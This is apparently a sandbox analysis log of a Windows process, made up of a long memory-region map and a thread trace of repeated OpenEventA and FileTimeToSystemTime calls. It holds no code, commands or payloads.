	        filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll")

Region:
	              id = 1217
	        start_va = 0x6fd80000
	          end_va = 0x6fd8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000006fd80000"
	        filename = ""

Region:
	              id = 1227
	        start_va = 0x32a0000
	          end_va = 0x32a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032a0000"
	        filename = ""

Region:
	              id = 1228
	        start_va = 0x32b0000
	          end_va = 0x32b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032b0000"
	        filename = ""

Region:
	              id = 1229
	        start_va = 0x32c0000
	          end_va = 0x32cffff
	     entry_point = 0x32c0000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll")

Region:
	              id = 1232
	        start_va = 0x32d0000
	          end_va = 0x32dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032d0000"
	        filename = ""

Region:
	              id = 1233
	        start_va = 0x32e0000
	          end_va = 0x33dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000032e0000"
	        filename = ""

Region:
	              id = 1234
	        start_va = 0x3740000
	          end_va = 0x3757fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003740000"
	        filename = ""

Region:
	              id = 1235
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1236
	        start_va = 0x57e0000
	          end_va = 0x5fdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000057e0000"
	        filename = ""

Region:
	              id = 1237
	        start_va = 0x3760000
	          end_va = 0x3781fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003760000"
	        filename = ""

Region:
	              id = 1238
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1239
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1240
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1241
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1242
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1246
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1247
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1249
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1250
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1251
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1252
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1254
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1255
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1258
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1259
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1277
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1278
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1290
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1291
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1292
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1293
	        start_va = 0x4fe0000
	          end_va = 0x57dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1329
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1330
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1331
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1332
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1333
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1334
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1335
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1336
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1337
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1338
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1339
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1340
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1341
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1342
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1343
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1344
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1345
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1346
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1347
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1348
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1349
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1350
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1351
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1352
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1353
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1354
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1355
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1356
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1357
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1358
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1359
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1360
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1361
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1362
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1363
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1364
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1365
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1375
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1376
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1377
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1378
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1379
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1380
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1381
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1382
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1383
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1384
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1385
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1386
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1387
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1388
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1389
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1390
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1391
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1392
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1393
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1394
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1395
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1396
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1397
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1398
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1399
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1400
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1401
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1402
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1403
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1404
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1405
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1406
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1407
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1408
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1409
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1410
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1411
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1412
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1413
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1414
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1415
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1416
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1418
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1419
	        start_va = 0x3740000
	          end_va = 0x3761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003740000"
	        filename = ""

Region:
	              id = 1420
	        start_va = 0x17700000
	          end_va = 0x196fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000017700000"
	        filename = ""

Region:
	              id = 1421
	        start_va = 0x18000000
	          end_va = 0x18ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000018000000"
	        filename = ""

Region:
	              id = 1422
	        start_va = 0x3740000
	          end_va = 0x377ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003740000"
	        filename = ""

Region:
	              id = 1423
	        start_va = 0x3780000
	          end_va = 0x387ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003780000"
	        filename = ""

Region:
	              id = 1424
	        start_va = 0x3880000
	          end_va = 0x38bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003880000"
	        filename = ""

Region:
	              id = 1425
	        start_va = 0x38c0000
	          end_va = 0x39bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000038c0000"
	        filename = ""

Region:
	              id = 1426
	        start_va = 0x39c0000
	          end_va = 0x39fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000039c0000"
	        filename = ""

Region:
	              id = 1427
	        start_va = 0x3a00000
	          end_va = 0x3afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003a00000"
	        filename = ""

Region:
	              id = 1428
	        start_va = 0x4fe0000
	          end_va = 0x501ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004fe0000"
	        filename = ""

Region:
	              id = 1429
	        start_va = 0x5020000
	          end_va = 0x511ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005020000"
	        filename = ""

Region:
	              id = 1430
	        start_va = 0xc400000
	          end_va = 0xc468fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000c400000"
	        filename = ""

Region:
	              id = 1431
	        start_va = 0xcb00000
	          end_va = 0xcb33fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000cb00000"
	        filename = ""

Region:
	              id = 1432
	        start_va = 0xcd00000
	          end_va = 0xcdfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000cd00000"
	        filename = ""

Region:
	              id = 1433
	        start_va = 0x14d00000
	          end_va = 0x14e1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000014d00000"
	        filename = ""

Region:
	              id = 1434
	        start_va = 0x1c000000
	          end_va = 0x1c082fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001c000000"
	        filename = ""

Region:
	              id = 1435
	        start_va = 0x1d200000
	          end_va = 0x1d218fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001d200000"
	        filename = ""

Region:
	              id = 1436
	        start_va = 0x1f300000
	          end_va = 0x1f333fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001f300000"
	        filename = ""

Region:
	              id = 1437
	        start_va = 0x25d00000
	          end_va = 0x25d33fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000025d00000"
	        filename = ""

Region:
	              id = 1438
	        start_va = 0x26900000
	          end_va = 0x2692ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000026900000"
	        filename = ""

Region:
	              id = 1439
	        start_va = 0x2fc00000
	          end_va = 0x2fc38fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000002fc00000"
	        filename = ""

Region:
	              id = 1440
	        start_va = 0x3e400000
	          end_va = 0x3e418fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003e400000"
	        filename = ""

Region:
	              id = 1441
	        start_va = 0x14d00000
	          end_va = 0x14d10fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000014d00000"
	        filename = ""

Region:
	              id = 1464
	        start_va = 0x1e600000
	          end_va = 0x1e7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001e600000"
	        filename = ""

Region:
	              id = 1465
	        start_va = 0x1e600000
	          end_va = 0x1e6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000001e600000"
	        filename = ""

Region:
	              id = 1467
	        start_va = 0x6400000
	          end_va = 0x65fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006400000"
	        filename = ""

Region:
	              id = 1468
	        start_va = 0x6400000
	          end_va = 0x64fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006400000"
	        filename = ""

Region:
	              id = 1472
	        start_va = 0xcf00000
	          end_va = 0xcffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000cf00000"
	        filename = ""

Region:
	              id = 1604
	        start_va = 0x6f810000
	          end_va = 0x6f821fff
	     entry_point = 0x6f810000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")


Thread:
	id = 56
	os_tid = 0xe74

	[0070.571] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="foaphmnbh") returned 0x0
	[0070.571] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="foaphmnbh") returned 0x0
	[0070.571] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.571] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] FileTimeToSystemTime (in: lpFileTime=0x40828e, lpSystemTime=0x40829e | out: lpSystemTime=0x40829e) returned 1
	[0070.572] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
